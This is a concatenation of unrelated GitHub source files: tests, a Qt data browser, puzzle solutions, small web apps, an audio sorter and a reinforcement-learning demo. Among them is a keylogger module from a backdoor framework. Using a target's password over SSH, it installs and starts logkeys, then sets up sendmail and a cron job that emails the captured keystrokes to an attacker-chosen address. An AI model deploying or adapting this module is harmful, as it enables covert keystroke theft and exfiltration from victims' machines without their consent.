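# once both services are added, main_service() should prefer MRP over DMAP\n 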
self.config.add_service(self.dmap_service)\n self.assertEqual(self.config.main_service(), self.dmap_service)\n\n self.config.add_service(self.mrp_service)\n self.assertEqual(self.config.main_service(), self.mrp_service)\n\n def test_main_service_override_protocol(self):\n self.config.add_service(self.dmap_service)\n self.config.add_service(self.mrp_service)\n self.assertEqual(\n self.config.main_service(protocol=self.dmap_service.protocol),\n self.dmap_service,\n )\n\n def test_set_credentials_for_missing_service(self):\n self.assertFalse(self.config.set_credentials(Protocol.DMAP, \"dummy\"))\n\n def test_set_credentials(self):\n self.config.add_service(self.dmap_service)\n self.assertIsNone(self.config.get_service(Protocol.DMAP).credentials)\n\n self.config.set_credentials(Protocol.DMAP, \"dummy\")\n self.assertEqual(self.config.get_service(Protocol.DMAP).credentials, \"dummy\")\n\n def test_empty_device_info(self):\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.Unknown)\n self.assertIsNone(device_info.version)\n self.assertIsNone(device_info.build_number)\n self.assertEqual(device_info.model, DeviceModel.Unknown)\n self.assertIsNone(device_info.mac)\n\n def test_tvos_device_info(self):\n self.config.add_service(self.mrp_service)\n self.config.add_service(self.airplay_service)\n\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.TvOS)\n self.assertEqual(device_info.version, \"8.0.0\")\n self.assertEqual(device_info.build_number, \"17K795\")\n self.assertEqual(device_info.model, DeviceModel.Gen4K)\n self.assertEqual(device_info.mac, \"FF:EE:DD:CC:BB:AA\")\n\n def test_tvos_device_info_no_airplay(self):\n self.config.add_service(self.mrp_service)\n\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.TvOS)\n self.assertEqual(device_info.version, \"13.3.1\")\n self.assertEqual(device_info.build_number, \"17K795\")\n self.assertEqual(device_info.model, DeviceModel.Unknown)\n self.assertEqual(device_info.mac, \"FF:EE:DD:CC:BB:AA\")\n\n def test_legacy_device_info(self):\n self.config.add_service(self.dmap_service)\n self.config.add_service(self.airplay_service)\n\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.Legacy)\n self.assertEqual(device_info.version, \"8.0.0\")\n self.assertIsNone(device_info.build_number)\n self.assertEqual(device_info.model, DeviceModel.Gen4K)\n self.assertEqual(device_info.mac, \"AA:BB:CC:DD:EE:FF\")\n\n def test_ready_dmap(self):\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.airplay_service)\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.dmap_service)\n self.assertTrue(self.config.ready)\n\n def test_ready_mrp(self):\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.airplay_service)\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.mrp_service)\n self.assertTrue(self.config.ready)\n\n # This test is a bit strange and couples to protocol specific services,\n # but it's mainly to exercise string as that is important. 
Might refactor\n # this in the future.\n def test_to_str(self):\n self.config.add_service(conf.DmapService(IDENTIFIER_1, \"LOGIN_ID\"))\n self.config.add_service(conf.MrpService(IDENTIFIER_2, PORT_2))\n\n # Check for some keywords to not lock up format too much\n output = str(self.config)\n self.assertIn(ADDRESS_1, output)\n self.assertIn(NAME, output)\n self.assertIn(\"LOGIN_ID\", output)\n self.assertIn(str(PORT_2), output)\n self.assertIn(\"3689\", output)\n","repo_name":"TeguhPratala/pyatv","sub_path":"tests/test_conf.py","file_name":"test_conf.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"19930248939","text":"import sys; sys.path.append('..')\n\nfrom dimsumpy.qt5.dataframemodel import DataFrameModel\nfrom functools import partial\nfrom futures_browser.fut_browser_view import FutBrowserWin\n\nimport pandas as pd\nfrom pandas.core.frame import DataFrame\nfrom PySide2.QtWidgets import QApplication, QCheckBox ,QGridLayout, QLineEdit ,QWidget, QFormLayout\nfrom PySide2.QtCore import Qt, QThread, QCoreApplication, QDateTime ,QRegExp ,QSortFilterProxyModel\n\nfrom shared_model.sql_model import cnx, postgres_engine\nfrom shared_model.st_data_model import MySortFilterProxyModel\nfrom shared_model.fut_data_model import getfutures, getfutcode\nfrom typing import Any, Dict, Generator, List\n\n\nclass FutBrowserDialog(FutBrowserWin):\n def __init__(self) -> None:\n super().__init__()\n self.b_list_option.clicked.connect(self.load_table)\n self.b_single_option.clicked.connect(self.load_table)\n\n def load_table(self) -> None:\n self.clear()\n sender: str = self.sender().accessibleName()\n\n if sender == 'b_list_option':\n tablename: str = 'fut_option'\n stockstr: str = self.stock_list_combobox.currentText()\n stocklist: List[str] = getfutcode(stockstr)\n stockliststr: str = str(tuple(stocklist))\n elif sender == 'b_single_option':\n tablename: str = 'fut_option'\n stockstr: str = self.stock_list_combobox_individual.currentText()[:2]\n stocklist: List[str] = [stockstr]\n stockliststr: str = \"('\" + stockstr + \"')\" # for single tuple\n else:\n print('no sender')\n q_clause: str = '' if not stocklist else ' WHERE symbol IN ' + stockliststr # prevent empty LineEdit\n q: str = 'SELECT * FROM ' + tablename + q_clause\n print(q)\n df: DataFrame = pd.read_sql(sql=q, con=postgres_engine)\n model: DataFrameModel = DataFrameModel(df)\n proxy: MySortFilterProxyModel = MySortFilterProxyModel(self)\n proxy.setSourceModel(model)\n self.pandas_tableview.setModel(proxy)\n\n grid: QGridLayout = QGridLayout() # If the Grid was created in the view, it will get deleted\n checkboxes: List[QCheckBox] = [QCheckBox(x) for x in df.columns]\n for count, checkbox in enumerate(checkboxes):\n checkbox.setChecked(True)\n checkbox.stateChanged.connect(partial(self.display_column, index=count))\n le1: QLineEdit = QLineEdit()\n le2: QLineEdit = QLineEdit()\n le1.textChanged.connect(lambda text, col=count:proxy.setFilterByColumn(\n QRegExp(text, Qt.CaseInsensitive, QRegExp.RegExp), col))\n le2.textChanged.connect(lambda text, col=count:proxy.setFilterByColumn(\n QRegExp(text, Qt.CaseInsensitive, QRegExp.FixedString), col))\n\n grid.addWidget(checkbox, count, 0)\n grid.addWidget(le1, count, 1)\n grid.addWidget(le2, count, 2)\n\n QWidget().setLayout(self.dockwin.layout()) # get rid of the default layout\n self.dockwin.setLayout(grid)\n\n def display_column(self, state: int, index: int) -> None: # state: checked 2 ; unchecked 0\n if 
state == Qt.Checked:\n self.pandas_tableview.setColumnHidden(index, False)\n else:\n self.pandas_tableview.setColumnHidden(index, True)\n\n\ndef main() -> None:\n app: QApplication = QApplication(sys.argv)\n w: FutBrowserDialog = FutBrowserDialog()\n w.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gate-max/pizzapy","sub_path":"brewing/retired/futures_browser/fut_browser_ctrl.py","file_name":"fut_browser_ctrl.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42397667042","text":"\nfrom injection import input_injection\nfrom models import Coords\nfrom year2022.day09.a import Coords, follow, move_head\n\n\n@input_injection\ndef main(_input: str) -> str:\n result: int = 0\n seen: set[tuple[int, int]] = set()\n\n head = Coords(name=\"head\")\n tail = Coords(name=\"tail\")\n snake = [head]\n for i in range(8):\n snake.append(Coords(name=f\"bodypart-{i + 1}\"))\n snake.append(tail)\n\n for line in _input.splitlines():\n direction, steps = line.split()\n for _ in range(int(steps)):\n move_head(head, direction)\n\n for i in range(len(snake) - 1):\n follow(snake[i], snake[i + 1])\n\n seen.add(tail.coords)\n\n result = len(seen)\n\n return str(result)\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"justcallmelarry/advent-of-code","sub_path":"src/year2022/day09/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32544882928","text":"from backdoors.backdoor import *\nimport os\nimport time\n\nclass Keylogger(Backdoor):\n prompt = Fore.RED + \"(keylogger) \" + Fore.BLUE + \">> \" + Fore.RESET\n\n def __init__(self, core):\n cmd.Cmd.__init__(self)\n self.intro = GOOD + \"Using keylogger auxiliary module\"\n self.core = core\n self.options = {\n \"email\": Option(\"email\", \"False\", \"set to \\\"True\\\" to send reports over email\", False),\n \"address\": Option(\"address\", \"example@example.com\", \"add email address\", False),\n\n }\n self.allow_modules = True\n self.modules = {}\n self.help_text = INFO + \"Installs logkeys and starts a listener, and gives the user the option to send the logs back to a specific email address.\"\n self.target = self.core.curtarget\n\n def get_command(self):\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S logkeys --start --output ~/log.log\")\n\n def do_exploit(self, args):\n os.system('git clone https://github.com/kernc/logkeys')\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S rm -rf logkeys/\")\n self.target.scpFiles(self, 'logkeys', True)\n self.target.ssh.exec_command(\"./logkeys/configure\")\n time.sleep(10)\n print(\"Configuring...\")\n self.target.ssh.exec_command(\"make logkeys\")\n time.sleep(10)\n print(\"Making...\")\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S make install logkeys\")\n print(\"Installing...\")\n time.sleep(10)\n self.target.ssh.exec_command(\"touch log.log\")\n time.sleep(1)\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S logkeys --start --output ~/log.log\")\n\n print(\"Starting...\")\n\n if (self.get_value(\"email\")):\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S apt-get install sendmail\")\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S apt-get install mailutils\")\n 
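# export the current crontab so the mail job can be appended and reinstalled\n 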
self.target.ssh.exec_command(\"crontab -l > mycron\")\n self.target.ssh.exec_command(\"echo 'echo report | mail -A ~/log.log \" + self.get_value(\"address\") + \"' > script.sh\")\n self.target.ssh.exec_command(\"echo \\\"* * * * 0 echo password | sudo -S bash ~/script.sh\\\" >> mycron && crontab mycron && rm mycron\")\n print(\"You will recieve an email(probably in spam) with your new keylogger report every hour.\")\n for mod in self.modules.keys():\n print(INFO + \"Attempting to execute \" + mod.name + \" module...\")\n mod.exploit(self.get_command())\n\n","repo_name":"Kkevsterrr/backdoorme","sub_path":"backdoors/auxiliary/keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":729,"dataset":"github-code","pt":"53"} +{"seq_id":"31637373768","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\nclass csr():\n def __init__(self, n: int, edges: list):\n self.start = [0] * (n + 1)\n self.elist = [0] * len(edges)\n for e in edges:\n self.start[e[0] + 1] += 1\n for i in range(1, n + 1):\n self.start[i] += self.start[i - 1]\n counter = self.start[::]\n for e in edges:\n self.elist[counter[e[0]]] = e[1]\n counter[e[0]] += 1\n\n\nclass internal_scc_graph():\n def __init__(self, n: int = 0):\n self.__n = n\n self.__edges = []\n\n def num_vertices(self):\n return self.__n\n\n def add_edge(self, from_: int, to: int):\n self.__edges.append([from_, to])\n\n def scc_ids(self):\n g = csr(self.__n, self.__edges)\n now_ord = 0\n group_num = 0\n visited = []\n low = [0] * self.__n\n ord = [-1] * self.__n\n ids = [0] * self.__n\n parent = [-1] * self.__n\n\n for root in range(self.__n):\n if(ord[root] == -1):\n stack = []\n stack.extend([root] * 2)\n while(stack):\n v = stack.pop()\n if(ord[v] == -1):\n visited.append(v)\n low[v] = now_ord\n ord[v] = now_ord\n now_ord += 1\n for i in range(g.start[v], g.start[v + 1]):\n to = g.elist[i]\n if(ord[to] == -1):\n stack.extend([to] * 2)\n parent[to] = v\n else:\n low[v] = min(low[v], ord[to])\n else:\n if(low[v] == ord[v]):\n while(True):\n u = visited.pop()\n ord[u] = self.__n\n ids[u] = group_num\n if(u == v):\n break\n group_num += 1\n if(parent[v] != -1):\n low[parent[v]] = min(low[parent[v]], low[v])\n\n for i, x in enumerate(ids):\n ids[i] = group_num - 1 - x\n return [group_num, ids]\n\n def scc(self):\n ids = self.scc_ids()\n group_num = ids[0]\n counts = [0] * group_num\n for x in ids[1]:\n counts[x] += 1\n groups = [[] for _ in range(group_num)]\n for i, x in enumerate(ids[1]):\n groups[x].append(i)\n\n return groups\n\n\nclass scc_graph():\n def __init__(self, n: int):\n self.__internal = internal_scc_graph(n)\n\n def add_edge(self, from_: int, to: int):\n n = self.__internal.num_vertices()\n assert (0 <= from_) & (from_ < n)\n assert (0 <= to) & (to < n)\n self.__internal.add_edge(from_, to)\n\n def scc(self):\n return self.__internal.scc()\n \n def scc_ids(self):\n return self.__internal.scc_ids()\n\nimport sys\nread = sys.stdin.read\n\nn,m,k,*data = read().split()\nn,m,k = map(int, [n,m,k])\nc = data[:n]\nab = [int(i)-1 for i in data[n:]]\n\ngr = scc_graph(n)\nit = iter(ab)\nfor a,b in zip(it,it):\n 
gr.add_edge(a,b)\n\ngroup_num, ids = gr.scc_ids()\n\nalp = [[] for _ in range(group_num)]\nfor i in range(n):\n    alp[ids[i]].append(c[i])\n\nlinks2 = [set() for _ in range(group_num)]\nlinks2_rev = [set() for _ in range(group_num)]\nit = iter(ab)\nfor a,b in zip(it,it):\n    a = ids[a]\n    b = ids[b]\n    if a != b:\n        links2[a].add(b)\n        links2_rev[b].add(a)\n\nstack = []\ndeg_in = [0] * group_num\nfor i in range(group_num):\n    deg_in[i] = len(links2_rev[i])\n    if deg_in[i] == 0:\n        stack.append(i)\n\ndp = [['z' * (k+1)] * (k+1) for _ in range(group_num)]\n\nwhile stack:\n    i = stack.pop()\n    alp[i].sort()\n    if len(alp[i]) == 0:\n        si = ''\n    else:\n        si = ''.join(alp[i])\n    for j in range(len(si)+1):\n        if j > k:\n            break\n        dp[i][j] = si[:j]\n    for j in range(1,k+1):\n        head = 'z'*(k+1)\n        for p in links2_rev[i]:\n            head = min(head,dp[p][j])\n        for l in range(len(si)+1):\n            if j + l > k:\n                break\n            dp[i][j+l] = min(dp[i][j+l], head + si[:l])\n\n    for child in links2[i]:\n        deg_in[child] -= 1\n        if deg_in[child] == 0:\n            stack.append(child)\n\n\nans = 'z' * (k+1)\nfor i in range(group_num):\n    ans = min(ans,dp[i][k])\n\nif ans == 'z'*(k+1):\n    print(-1)\nelse:\n    print(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc030/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5621170645","text":"from flask import Flask, render_template\r\nimport redis\r\nimport json\r\n\r\napp = Flask(__name__)\r\nredis_client = redis.StrictRedis(host='localhost', port=6379)\r\n\r\n@app.route('/')\r\ndef index():\r\n    # Retrieve all keys matching the \"vlibid:*\" pattern\r\n    all_keys = redis_client.keys(\"vlibid:*\")\r\n\r\n    # Initialise a list to hold all the data\r\n    all_data = []\r\n\r\n    # Iterate over the keys and fetch the data associated with each\r\n    for key in all_keys:\r\n        data_raw = redis_client.hgetall(key)\r\n        data = {k.decode('utf-8'): v.decode('utf-8') for k, v in data_raw.items()}\r\n        all_data.append(data)\r\n\r\n    return render_template('index_all.html', all_data=all_data)\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True)\r\n","repo_name":"LudovicGauvin99/TPRedis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72520185449","text":"import threading\nimport os\nimport re\nimport shutil\nimport time\n\nimport pyaudio\nimport wave\n\nclass Cancel_token:\n    def __init__(self):\n        self.cancelled = False\n\n    def cancel(self):\n        self.cancelled = True\n\n    def is_cancelled(self):\n        return self.cancelled\n\nclass AudioFile:\n    chunk = 1024\n    # playing = False\n\n    def __init__(self, file, cancel_token):\n        \"\"\" Init audio stream \"\"\" \n        self.wf = wave.open(file, 'rb')\n        self.p = pyaudio.PyAudio()\n        self.stream = self.p.open(\n            format = self.p.get_format_from_width(self.wf.getsampwidth()),\n            channels = self.wf.getnchannels(),\n            rate = self.wf.getframerate(),\n            output = True\n        )\n        self.cancel_token = cancel_token\n\n    def play(self):\n        \"\"\" Play entire file \"\"\"\n        data = self.wf.readframes(self.chunk)\n        # self.playing = True\n        while data != b'' and not self.cancel_token.is_cancelled():\n            self.stream.write(data)\n            data = self.wf.readframes(self.chunk)\n        # self.playing = False\n\n    def close(self):\n        \"\"\" Graceful shutdown \"\"\" \n        self.stream.close()\n        self.p.terminate()\n\n    # def stop(self):\n    # 
\"\"\"Stop playback\"\"\"\n # self.playing = False\n # self.close()\n\n\ndef check_audio_file(path) -> int:\n\n def except_func(e: Exception) -> int:\n print(f\"Error while playing audio file: {path}, error: {e}\")\n return 2\n \n cancel_token = Cancel_token()\n try:\n audio_file = AudioFile(path, cancel_token)\n except Exception as e:\n return except_func(e)\n \n t = threading.Thread(target=audio_file.play)\n try:\n t.start()\n is_sample = input()\n cancel_token.cancel()\n audio_file.close()\n t.join()\n\n if is_sample == \"n\" or is_sample == \"3\":\n return 1\n elif is_sample == \"r\" or is_sample == \"0\":\n return check_audio_file(path)\n elif is_sample == \"e\" or is_sample == \"9\":\n return except_func(Exception(\"User was not sure\"))\n else:\n return 0\n except Exception as e:\n t.join()\n return except_func(e)\n \n\ndef manual_check(source_path):\n not_sample_path = os.path.join(source_path, \"not_sample\")\n if not os.path.exists(not_sample_path):\n os.mkdir(not_sample_path)\n\n error_files_path = os.path.join(source_path, \"error_files\")\n if not os.path.exists(error_files_path):\n os.mkdir(error_files_path)\n\n controlled_samples_path = os.path.join(source_path, \"controlled_samples\")\n if not os.path.exists(controlled_samples_path):\n os.mkdir(controlled_samples_path)\n\n for file in os.listdir(source_path):\n if not file.endswith(\".wav\"):\n continue\n path = os.path.join(source_path, file)\n return_value = check_audio_file(path)\n\n if return_value == 0:\n shutil.move(path, os.path.join(controlled_samples_path, file))\n if return_value == 1:\n shutil.move(path, os.path.join(not_sample_path, file))\n elif return_value == 2:\n shutil.move(path, os.path.join(error_files_path, file))\n\n\ndef main():\n source_path = r\"C:\\Users\\llama\\Desktop\\programming shit\\Bakalarka\\manual_check\"\n manual_check(source_path)\n\nif __name__ == \"__main__\":\n main()","repo_name":"PatrikBacko/Bachelor_thesis-Electronic_music","sub_path":"scripts/data_sorting_script/manual_check.py","file_name":"manual_check.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22323060425","text":"from wsgiref.simple_server import make_server\nimport cgi\nimport random\n\nHTML_PAGE_Rating = \"\"\"\n<html>\n<title>Рейтинг команд\n\n
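<!-- standings page template; the placeholder below is filled with one table row per team by CreateResults() -->\n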

Рейтинг команд

\n
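<!-- league standings table -->\n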
\n\n\n\n\n\n\n\n\n\n\n\n\n{}\n
<tr><th>Назва</th><th>Ігор</th><th>Виграшів</th><th>Нічиїх</th><th>Поразок</th><th>Голів забито</th><th>Голів пропущено</th><th>Кількість очок</th></tr>
\n\n\n\"\"\"\n\nHTML_PAGE_Results = \"\"\"\n\n\n\n
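<!-- match results page template; the placeholder is filled with one row per match by CreateMatchList() -->\n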

Ігрові результати

\n
\n\n\n\n\n\n\n\n{}\n
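<!-- header row of the results table -->\n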
<tr><th>Перша команда</th><th>Друга команда</th><th>_</th><th>_</th></tr>
\n\n\n\"\"\"\n\nHTML_PAGE_main = \"\"\"\nГоловна\n\n
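<!-- home page template, served for the root path -->\n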
\n
\n\n
\n
\n\n
\n\n\n\"\"\"\n\nclass Command:\n    name=''\n    games=0  # starts at 0; incremented once per match played\n    win=0\n    lose=0\n    withdraws=0\n    goal_in=0\n    goal_out=0\n\n    def GetScore(self):\n        return self.win*3+self.withdraws*1\n    def __init__(self,n):\n        self.name=n\n    def __lt__(self,other):\n        if self.GetScore()!=other.GetScore():\n            return self.GetScore()<other.GetScore()\n        # Tiebreaker (assumption, the original line was corrupted): goal difference\n        return (self.goal_in-self.goal_out)<(other.goal_in-other.goal_out)\n\n\n# NOTE: the original body of CreateResults was corrupted in the source; the\n# aggregation below is a reconstruction from context (one match per line of\n# list_of_matches.txt: team1 team2 goals1 goals2).\ndef CreateResults():\n    result=''\n    list_of_strings=[]\n    list_file = open(\"list_of_matches.txt\")\n    for line in list_file:\n        divided_line = line.split()\n        list_of_strings.append(divided_line)\n    list_file.close()\n\n    commands={}\n    for item in list_of_strings:\n        for team_name in (item[0], item[1]):\n            if team_name not in commands:\n                commands[team_name]=Command(team_name)\n        first=commands[item[0]]\n        second=commands[item[1]]\n        first.games+=1\n        second.games+=1\n        first.goal_in+=int(item[2])\n        first.goal_out+=int(item[3])\n        second.goal_in+=int(item[3])\n        second.goal_out+=int(item[2])\n        is_first_winer=False\n        if int(item[2])>int(item[3]):\n            is_first_winer=True\n        if int(item[2])==int(item[3]):\n            first.withdraws+=1\n            second.withdraws+=1\n        elif is_first_winer:\n            first.win+=1\n            second.lose+=1\n        else:\n            first.lose+=1\n            second.win+=1\n\n    rating=sorted(commands.values(), reverse=True)\n    index=0\n    while index<len(rating):\n        item=rating[index]\n        result+='<tr><td>' + item.name + '</td><td>' + str(item.games) + '</td><td>' + str(item.win) +'</td><td>' + str(item.withdraws) + '</td><td>' + str(item.lose) + '</td><td>' + str(item.goal_in) + '</td><td>' + str(item.goal_out) + '</td><td>' + str(item.GetScore()) + '</td></tr>'\n        index+=1\n    return result\n\n\ndef CreateRatingList():\n    result=''\n    list_of_strings=[]\n    list_file = open(\"list_of_matches.txt\")\n    for line in list_file:\n        divided_line = line.split()\n        list_of_strings.append(divided_line)\n\n    print(list_of_strings)\n    list_file.close()\n\n    for item in list_of_strings:\n        result+='<tr><td>' + item[0] + '</td><td>' + item[1] + '</td><td>' + item[2] + '</td><td>' + item[3] +'</td></tr>'\n    print(result)\n    return result\n\ndef CreateMatchList():\n    result=''\n    list_of_strings=[]\n    list_file = open(\"list_of_matches.txt\")\n    for line in list_file:\n        divided_line = line.split()\n        list_of_strings.append(divided_line)\n\n    list_file.close()\n    for item in list_of_strings:\n        result+='<tr><td>' + item[0] + '</td><td>' + item[1] + '</td><td>' + item[2] + '</td><td>' + item[3] +'</td></tr>'\n    return result\n\n\ndef application(environ,start_response):\n    if environ.get('PATH_INFO', '').lstrip('/') == \"results\":\n        body = HTML_PAGE_Results.format(CreateMatchList())\n        start_response('200 OK', [('Content-Type', 'text/html; charset=utf-8')])\n    elif environ.get('PATH_INFO', '').lstrip('/') == 'rating':\n        body = HTML_PAGE_Rating.format(CreateResults())\n        start_response('200 OK', [('Content-Type', 'text/html; charset=utf-8')])\n    elif environ.get('PATH_INFO', '').lstrip('/') == '':\n        body = HTML_PAGE_main\n        start_response('200 OK', [('Content-Type', 'text/html; charset=utf-8')])\n    else:\n        body=\"OOOPS! 
Something is wrong!\"\n start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])\n return [bytes(body, encoding='utf-8')]\nprint('=== Local WSGI webserver ===')\nmy_server = make_server('localhost', 8000, application).serve_forever()","repo_name":"AlexP04/WSGI_programs","sub_path":"WSGI_football_server.py","file_name":"WSGI_football_server.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19207827962","text":"import tensorflow as tf\nimport numpy as np\nimport gym\nimport time\n\n############################### DDPG ####################################\n\nclass DDPG(object):\n ##################### hyper parameters ####################\n LR_A = 0.001 # learning rate for actor\n LR_C = 0.002 # learning rate for critic\n GAMMA = 0.9 # reward discount\n TAU = 0.01 # soft replacement\n MEMORY_CAPACITY = 10000\n BATCH_SIZE = 32\n\n def __init__(self, a_dim, s_dim, a_bound,):\n self.memory = np.zeros((self.MEMORY_CAPACITY, s_dim * 2 + a_dim + 1), dtype=np.float32)\n self.pointer = 0\n self.sess = tf.Session()\n\n self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,\n self.S = tf.placeholder(tf.float32, [None, s_dim], 's')\n self.S_ = tf.placeholder(tf.float32, [None, s_dim], 's_')\n self.R = tf.placeholder(tf.float32, [None, 1], 'r')\n\n with tf.variable_scope('Actor'):\n self.a = self._build_a(self.S, scope='eval', trainable=True)\n a_ = self._build_a(self.S_, scope='target', trainable=False)\n with tf.variable_scope('Critic'):\n # assign self.a = a in memory when calculating q for td_error,\n # otherwise the self.a is from Actor when updating Actor\n q = self._build_c(self.S, self.a, scope='eval', trainable=True)\n q_ = self._build_c(self.S_, a_, scope='target', trainable=False)\n\n # networks parameters\n self.ae_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval')\n self.at_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target')\n self.ce_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/eval')\n self.ct_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/target')\n\n # target net replacement\n self.soft_replace = [tf.assign(t, (1 - self.TAU) * t + self.TAU * e)\n for t, e in zip(self.at_params + self.ct_params, self.ae_params + self.ce_params)]\n\n q_target = self.R + self.GAMMA * q_\n # in the feed_dic for the td_error, the self.a should change to actions in memory\n td_error = tf.losses.mean_squared_error(labels=q_target, predictions=q)\n self.ctrain = tf.train.AdamOptimizer(self.LR_C).minimize(td_error, var_list=self.ce_params)\n\n a_loss = - tf.reduce_mean(q) # maximize the q\n self.atrain = tf.train.AdamOptimizer(self.LR_A).minimize(a_loss, var_list=self.ae_params)\n\n self.sess.run(tf.global_variables_initializer())\n\n def choose_action(self, s):\n actions = self.sess.run(self.a, {self.S: s[np.newaxis, :]})\n # print(\"actions: \", actions)\n return actions[0]\n\n def learn(self):\n # soft target replacement\n self.sess.run(self.soft_replace)\n\n indices = np.random.choice(self.MEMORY_CAPACITY, size=self.BATCH_SIZE)\n bt = self.memory[indices, :]\n bs = bt[:, :self.s_dim]\n ba = bt[:, self.s_dim: self.s_dim + self.a_dim]\n br = bt[:, -self.s_dim - 1: -self.s_dim]\n bs_ = bt[:, -self.s_dim:]\n\n self.sess.run(self.atrain, {self.S: bs})\n self.sess.run(self.ctrain, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})\n\n def store_transition(self, s, a, r, s_):\n transition = 
np.hstack((s, a, [r], s_))\n index = self.pointer % self.MEMORY_CAPACITY # replace the old memory with new memory\n self.memory[index, :] = transition\n self.pointer += 1\n\n def _build_a(self, s, scope, trainable):\n with tf.variable_scope(scope):\n net = tf.layers.dense(s, 30, activation=tf.nn.relu, name='l1', trainable=trainable)\n a = tf.layers.dense(net, self.a_dim, activation=tf.nn.tanh, name='a', trainable=trainable)\n return tf.multiply(a, self.a_bound, name='scaled_a')\n\n def _build_c(self, s, a, scope, trainable):\n with tf.variable_scope(scope):\n n_l1 = 30\n w1_s = tf.get_variable('w1_s', [self.s_dim, n_l1], trainable=trainable)\n w1_a = tf.get_variable('w1_a', [self.a_dim, n_l1], trainable=trainable)\n b1 = tf.get_variable('b1', [1, n_l1], trainable=trainable)\n net = tf.nn.relu(tf.matmul(s, w1_s) + tf.matmul(a, w1_a) + b1)\n return tf.layers.dense(net, 1, trainable=trainable) # Q(s,a)\n \n def save(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.save(self.sess, filename)\n \n def load(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(self.sess, filename)\n\n############################### training ####################################\n############################### A Demo ####################################\n\nMAX_EPISODES = 2000\nMAX_EP_STEPS = 200\nRENDER = False\nENV_NAME = 'Pendulum-v0'\n\ndef train():\n env = gym.make(ENV_NAME)\n env = env.unwrapped\n env.seed(1)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = env.action_space.high\n\n ddpg = DDPG(a_dim, s_dim, a_bound)\n\n var = 3 # control exploration\n t1 = time.time()\n ave_rs = []\n for episode in range(MAX_EPISODES):\n s = env.reset()\n ep_reward = 0\n for j in range(MAX_EP_STEPS):\n if RENDER:\n env.render()\n\n # Add exploration noise\n a = ddpg.choose_action(s)\n a = np.clip(np.random.normal(a, var), -2, 2) # add randomness to action selection for exploration\n s_, r, done, info = env.step(a)\n\n ddpg.store_transition(s, a, r / 10, s_)\n\n if ddpg.pointer > ddpg.MEMORY_CAPACITY:\n var *= .9995 # decay the action randomness\n ddpg.learn()\n\n s = s_\n ep_reward += r\n if j == MAX_EP_STEPS-1:\n # print('Episode:', episode, ' Reward: %i' % int(ep_reward), 'Explore: %.2f' % var, )\n # if ep_reward > -300:RENDER = True\n break\n if episode % 100 == 0:\n total_reward = 0\n for i in range(10):\n state = env.reset()\n for j in range(MAX_EP_STEPS):\n env.render()\n action = ddpg.choose_action(state) # direct action for test\n state,reward,done,_ = env.step(action)\n total_reward += reward\n if done:\n break\n ave_reward = total_reward/300\n print ('episode: ',episode,'Evaluation Average Reward:',ave_reward)\n ave_rs.append(ave_reward)\n print(ave_rs)\n if (sum(ave_rs[-5:])/5.0 > -10):\n ddpg.save('./log/model.ckpt')\n return\n print('Running time: ', time.time() - t1)\n\ndef validate():\n env = gym.make(ENV_NAME)\n env = env.unwrapped\n env.seed(1)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = env.action_space.high\n\n ddpg = 